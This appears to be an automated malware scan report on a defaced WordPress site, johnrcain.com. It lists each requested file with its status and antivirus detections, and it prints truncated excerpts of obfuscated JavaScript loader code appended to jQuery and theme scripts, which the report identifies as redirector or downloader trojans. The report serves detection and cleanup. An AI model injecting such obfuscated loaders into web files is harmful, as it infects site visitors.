Request | Server response | Status |
http://johnrcain.com/ | 200 OK Content-Length: 30146 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By rEd X - 3xp1r3 Cyber Army | rEd X Was Here<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>Hacked By rEd X - 3xp1r3 Cyber Army | rEd X Was Here</title>
<link rel="stylesheet" href="http://johnrcain.com/wp-content/themes/DeepFocus/style.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://johnrcain.com/wp-content/themes/DeepFocus/css/jquery.fancybox-1.2.6.css" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="Hacked By rEd X – 3xp1r3 Cyber Arm ...[34443 bytes skipped]... |
http://johnrcain.com/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 84445 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
... 3138 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.cycle.all.min.js | 200 OK Content-Length: 30086 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele
... 3027 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V0517
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.easing.1.3.js | 200 OK Content-Length: 10303 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur
... 3278 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/superfish.js | 200 OK Content-Length: 5920 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 3294 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/cufon-yui.js | 200 OK Content-Length: 20463 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3035 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
- ESET-NOD32
- JS/Agent.NDY
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/colaborate_thin.js | 200 OK Content-Length: 56761 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Cufon.registerFont({"w":460,"face":{"font-family":"Colaborate-Thin","font-weight":400,"font-stretch":"normal","units-per-em":"1000","panose-1":"2 0 5 6 5 0 0 2 0 4","ascent":"800","descent":"-200","x-height":"10","bbox":"-124 -835 1001 197","underline-thickness":"50","underline-position":"-50","stemh":"36","stemv":"46","unicode-range":"U+0020-U+FB02"},"glyphs":{" ":{"w":230},"\u00f0":{"d":"415,-283v0,148,-30,297,-193,297v-115,0,-178,-103,-178,-210v0,-116,61,-199,178,-199v72,0,123,53,151,11
... 3004 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/scrollTo.js | 200 OK Content-Length: 4468 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['iframe','#document','html','body'])!=-1;if(!i)return a;var e=(a.contentWindow||a).document||a.ownerDocument||a;return d.browser.safari||e.compatMode=='BackCompat'?e.body:e.documentE
... 3183 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- eSafe
- JS.Agent.gnk
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/serialScroll.js | 200 OK Content-Length: 4228 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(a){var b=a.serialScroll=function(c){return a(window).serialScroll(c)};b.defaults={duration:1e3,axis:"x",event:"click",start:0,step:1,lock:!0,cycle:!0,constant:!0};a.fn.serialScroll=function(c){return this.each(function(){var t=a.extend({},b.defaults,c),s=t.event,i=t.step,r=t.lazy,e=t.target?this:document,u=a(t.target||this,e),p=u[0],m=t.items,h=t.start,g=t.interval,k=t.navigation,l;if(!r){m=d()}if(t.force){f({},h)}a(t.prev||[],e).bind(s,-i,q);a(t.next||[],e).bind(s,i,q);if(!p.ss
... 2944 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/wp-content/themes/DeepFocus/js/jquery.fancybox-1.2.6.pack.js | 200 OK Content-Length: 11728 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\'
... 3083 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Trojan
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- Microsoft
- Trojan:JS/Redirector.IM
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- PCTools
- Malware.JS-Alescurf
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- eSafe
- JS.Agent.gnk
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://johnrcain.com/?page_id=2 | 200 OK Content-Length: 34205 Content-Type: text/html | clean |
http://johnrcain.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 2992 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 2003 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- Microsoft
- Trojan:JS/Redirector.IM
- NANO-Antivirus
- Trojan.Url.IframeB.bfxfei
- AVG
- JS/Agent
|
http://johnrcain.com/?page_id=10 | 200 OK Content-Length: 32604 Content-Type: text/html | clean |
http://johnrcain.com/?page_id=88 | 200 OK Content-Length: 32658 Content-Type: text/html | clean |